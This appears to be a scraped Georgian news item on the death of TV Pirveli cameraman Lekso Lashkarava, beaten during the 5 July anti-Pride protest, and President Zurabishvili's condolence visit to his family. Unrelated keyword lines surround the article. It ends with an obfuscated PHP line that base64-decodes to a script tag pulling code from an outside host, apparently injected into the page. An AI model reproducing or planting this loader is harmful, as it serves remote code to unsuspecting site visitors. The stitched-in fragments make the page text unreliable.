celsiusi
ავერსი საქკაბელი
საქართველოს პრეზიდენტი სალომე ზურაბიშვილი ოპერატორ ლექსო ლაშქარავას სახლში მივიდა და გარდაცვლილის ოჯახს პირადად მიუსამძიმრა.
 
„ტვ პირველის“ ოპერატორი ლექსო ლაშქარავა, რომელსაც 5 ივლისის მოვლენების დროს სცემეს, გარდაიცვალა. გარდაცვალების მიზეზი ამ დროისთვის უცნობია.
 
ლექსო ლაშქარავა კლინიკაში რამდენიმე დღის განმავლობაში იმყოფებოდა, რის შემდეგაც სახლში გაწერეს. ფაქტზე დაწყებულია გამოძიება.
 
„თბილისი პრაიდის“ საწინააღმდეგოდ გამართული აქციის მიმდინარეობის დროს, ორგანიზაცია „სირცხვილიას“ ოფისში, „ტვ პირველის“ ჟურნალისტსა და ოპერატორ ლექსო ლაშქარავას სამსახურებრივი მოვალეობის შესრულებისას ფიზიკური და სიტყვიერი შეურაცხყოფა მიაყენეს.
1311
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");